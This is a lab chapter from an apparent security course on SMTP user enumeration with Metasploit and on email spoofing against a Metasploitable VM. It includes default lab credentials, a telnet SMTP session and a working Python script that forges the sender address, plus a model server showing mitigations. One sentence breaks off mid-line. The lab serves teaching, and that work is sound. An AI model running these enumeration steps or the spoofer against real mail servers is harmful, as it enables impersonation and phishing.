Chapter 9 SMTP enumeration & email spoofing

9.1 Background

For this lab you are going to build an email address spoofer that implements the SMTP protocol over TCP. Modern email servers have several solutions that make it more difficult to spoof emails. However, the SMTP protocol itself does not check that the message is coming from a valid server or that the email was actually created by the stated sender. To demonstrate this, we will set up a metasploitable server.

9.2 SMTP enumeration

In an SMTP enumeration attack an attacker tries to get a list of valid email addresses from a server. Kali Linux has

Step 1 Determine the IP address of the metasploitable machine using the ifconfig command. Username: msfadmin, password: msfadmin

Step 2 Start the metasploit console. Select the smtp_enum module by typing the following:

msf > use auxiliary/scanner/smtp/smtp_enum

Step 3 Set the host that you want to scan by typing the following. Replace xxx.xxx.xxx.xxx with the IP address of the metasploitable machine.

msf auxiliary(smtp_enum) > set RHOSTS xxx.xxx.xxx.xxx

RHOSTS => 192.168.1.56

msf auxiliary(smtp_enum) > run

You should see a list of users on the server.

[Include screenshot below]

An attacker could use an SMTP enumeration attack to get the email addresses that are available on the server. In the following section we develop the software required to execute an SMTP spoofing attack.

9.3 Email Spoofing

Step 1. Download the free version of VMware Player. (You can also use VirtualBox if you already have it installed or just like it more.)

Step 2. Connect to the metasploitable server via telnet:

telnet xxx.xxx.xxx.xxx 25

where xxx.xxx.xxx.xxx is the IP address of the metasploitable server.

Remember that you can get the address of the metasploitable server by logging in with username msfadmin and password msfadmin.

The metasploitable server will now let you communicate with it via telnet. (Not encrypted, so fun for snooping.)

Step 3 Follow the SMTP communication protocol to send an email from hacking@virginia.edu. (The figure below shows the results of the process.)

Great, now we have a mail server that is configured and that we can communicate with. Let's go ahead and write a TCP application that implements the process for us.

Step 4 Open the IDE.

The code below shows an implementation of a program that executes the SMTP protocol over a TCP connection.
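The server side of the dialog you just typed into telnet, as an added example (not the lab's code and not Metasploitable's mail server; the hostname mail.example.test is an assumed name): a small in-memory model of an SMTP session that shows why the spoof works (MAIL FROM is accepted on faith) and what a hardened server changes to blunt the enumeration from 9.2 (VRFY/EXPN answered with a non-committal 252, RCPT TO restricted to local mailboxes).

```python
import re

class SmtpSession:
    """Server side of one SMTP connection (constructed model, see lead-in)."""
    def __init__(self, hostname="mail.example.test"):  # assumed hostname
        self.hostname = hostname
        self.helo = self.sender = None
        self.rcpts, self.body, self.in_data = [], [], False
        self.delivered = []  # (sender, recipients, body) accepted so far

    def greeting(self):
        return f"220 {self.hostname} ESMTP\r\n"

    def handle_line(self, line):
        """Feed one CRLF-terminated client line; return the server reply."""
        line = line.rstrip("\r\n")
        if self.in_data:  # inside DATA: collect until a line holding only "."
            if line != ".":
                self.body.append(line[1:] if line.startswith("..") else line)
                return ""  # the server stays silent until the terminator
            self.delivered.append((self.sender, self.rcpts, "\n".join(self.body)))
            self.sender, self.rcpts, self.body, self.in_data = None, [], [], False
            return "250 OK: queued\r\n"
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg
            return f"250 {self.hostname}\r\n"
        if verb in ("VRFY", "EXPN"):  # mitigation: never confirm whether a mailbox exists
            return "252 Cannot VRFY user, but will accept message\r\n"
        if verb == "MAIL" and self.helo and (m := re.match(r"FROM:\s*<([^>]*)>", arg, re.I)):
            self.sender = m.group(1)  # taken on faith: SMTP never checks this address
            return "250 OK\r\n"
        if verb == "RCPT" and self.sender is not None and (m := re.match(r"TO:\s*<([^>]*)>", arg, re.I)):
            user, _, domain = m.group(1).partition("@")
            if domain not in ("", self.hostname):  # mitigation: local delivery only, no open relay
                return "550 Relay access denied\r\n"
            self.rcpts.append(user)
            return "250 OK\r\n"
        if verb == "DATA" and self.rcpts:
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>\r\n"
        if verb == "QUIT":
            return "221 Bye\r\n"
        return "503 Bad sequence of commands\r\n" if verb in ("MAIL", "RCPT", "DATA") else "500 Syntax error\r\n"

def run_dialog(lines):
    """Replay a client transcript; return the session and the non-empty replies."""
    s = SmtpSession()
    return s, [s.greeting()] + [r for r in map(s.handle_line, lines) if r]
```

Feeding it the same commands the spoofer sends shows the spoofed envelope sender being queued for the local user while VRFY and an external RCPT TO are refused.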


import sys, socket

size = 1024


def sendMessage(smtpServer, port, fromAddress, toAddress, message):
    IP = smtpServer
    PORT = int(port)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))  # open a TCP connection to the SMTP port
    print(s.recv(size).decode())  # display the 220 greeting
    # SMTP lines end in CRLF; the server does not verify the HELO name
    s.sendall(b'HELO virginia.edu\r\n')
    print(s.recv(size).decode())  # display response
    # the envelope sender is accepted as given: this is what makes spoofing possible
    s.sendall(b'MAIL FROM:<' + fromAddress.encode() + b'>\r\n')
    print(s.recv(size).decode())  # display response
    s.sendall(b'RCPT TO:<' + toAddress.encode() + b'>\r\n')  # send RCPT TO:
    print(s.recv(size).decode())  # display response
    s.sendall(b'DATA\r\n')  # send DATA, expect a 354 reply
    print(s.recv(size).decode())  # display response
    # message body, terminated by a line containing only "."
    s.sendall(message.encode() + b'\r\n.\r\n')
    print(s.recv(size).decode())  # display response (250 if queued)
    s.sendall(b'QUIT\r\n')  # send QUIT
    print(s.recv(size).decode())  # display response
    s.close()


def main(args):
    if len(args) != 6:
        print("usage: espoofer.py <server> <port> <from> <to> \"<message>\"")
        sys.exit(1)
    smtpServer = args[1]
    port = args[2]
    fromAddress = args[3]
    toAddress = args[4]
    message = args[5]
    sendMessage(smtpServer, port, fromAddress, toAddress, message)


if __name__ == "__main__":
    main(sys.argv)

Step 5 Create a folder called spoofer on the Kali desktop, save the program above to that folder, and call it espoofer.py.

Step 6 Open the terminal and cd to ~/Desktop/spoofer

Step 7 Run the spoofer by typing the following command into the terminal. The message is quoted so that the shell passes it as a single argument.


python espoofer.py [IP-Metasploitable] 25 admin@youtube.com sys "Hello From the other side"

[Include screen shot]

9.4 Checking that the email was correctly received.

Step 1 Log in to the metasploitable server. Username: msfadmin, Password: msfadmin

Step 2 Open the terminal and check the sys mailbox on the mail server by typing

sudo cat /var/spool/mail/sys

[Include a screen shot below]